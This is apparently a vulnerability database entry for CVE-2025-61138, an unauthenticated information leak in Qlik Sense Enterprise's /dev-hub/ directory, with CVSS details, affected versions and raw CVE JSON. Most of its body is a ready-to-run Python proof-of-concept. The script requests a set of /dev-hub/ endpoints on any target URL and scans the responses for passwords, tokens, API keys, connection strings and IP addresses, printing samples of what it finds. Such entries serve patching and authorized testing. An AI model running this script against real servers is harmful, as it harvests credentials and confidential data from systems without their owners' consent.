Security Vulnerability Report
中文
CVE-2025-61138 CVSS 7.5 HIGH

CVE-2025-61138

Published: 2025-11-20 22:16:02
Last Modified: 2025-12-10 20:45:08

Description

Qlik Sense Enterprise v14.212.13 was discovered to contain an information leak via the /dev-hub/ directory.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:qlik:qlik_sense:14.212.13:*:*:*:enterprise:*:*:* - VULNERABLE
Qlik Sense Enterprise Windows <= 14.212.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61138 PoC - Information Disclosure via /dev-hub/ # Target: Qlik Sense Enterprise Windows <= v14.212.13 import requests import sys import re def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-61138 """ # Add trailing slash if not present if not target_url.endswith('/'): target_url += '/' # Endpoints to test for information disclosure endpoints = [ 'dev-hub/', 'dev-hub/api/', 'dev-hub/qrs/', 'dev-hub/qrs/about', 'dev-hub/diagnostic/', 'dev-hub/monitor/', 'dev-hub/audit/' ] print(f"[*] Testing target: {target_url}") print(f"[*] Target: Qlik Sense Enterprise Windows <= v14.212.13") print(f"[*] Vulnerability: Information Disclosure via /dev-hub/ directory") print("=" * 60) vulnerable = False for endpoint in endpoints: url = target_url + endpoint print(f"\n[>] Testing: {url}") try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content = response.text # Check for sensitive information patterns sensitive_patterns = [ r'(?i)(password|secret|key|token)', r'(?i)(connection|database|sql)', r'(?i)(api[_-]?key|access[_-]?token)', r'(?i)(internal|confidential|private)', r'\b[A-Za-z0-9]{32,}\b', # Long alphanumeric strings r'(?i)(path|directory|folder)', r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', # IP addresses ] found_sensitive = False for pattern in sensitive_patterns: if re.search(pattern, content): found_sensitive = True print(f"[!] Potential sensitive data found (pattern: {pattern})") if found_sensitive or len(content) > 1000: print(f"[+] VULNERABLE! Status: {response.status_code}") print(f"[+] Response length: {len(content)} bytes") print(f"[+] Sample content:\n{content[:500]}...") vulnerable = True else: print(f"[*] Endpoint accessible but no obvious sensitive data") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {response.status_code}") else: print(f"[-] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[X] Error: {str(e)}") print("\n" + "=" * 60) if vulnerable: print("[!] Target is VULNERABLE to CVE-2025-61138") print("[!] Recommendation: Apply vendor patch immediately") else: print("[*] Target may not be vulnerable or /dev-hub/ not exposed") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-61138.py <target_url>") print("Example: python cve-2025-61138.py https://qlikserver.example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61138", "sourceIdentifier": "[email protected]", "published": "2025-11-20T22:16:01.610", "lastModified": "2025-12-10T20:45:07.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Qlik Sense Enterprise v14.212.13 was discovered to contain an information leak via the /dev-hub/ directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qlik:qlik_sense:14.212.13:*:*:*:enterprise:*:*:*", "matchCriteriaId": "94801095-619D-41F4-AE29-11E0CC268650"}]}]}], "references": [{"url": "https://gist.github.com/Israel0x00/8a81ec98162e9ca8e4a3a6c8b4ef4762", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}]}}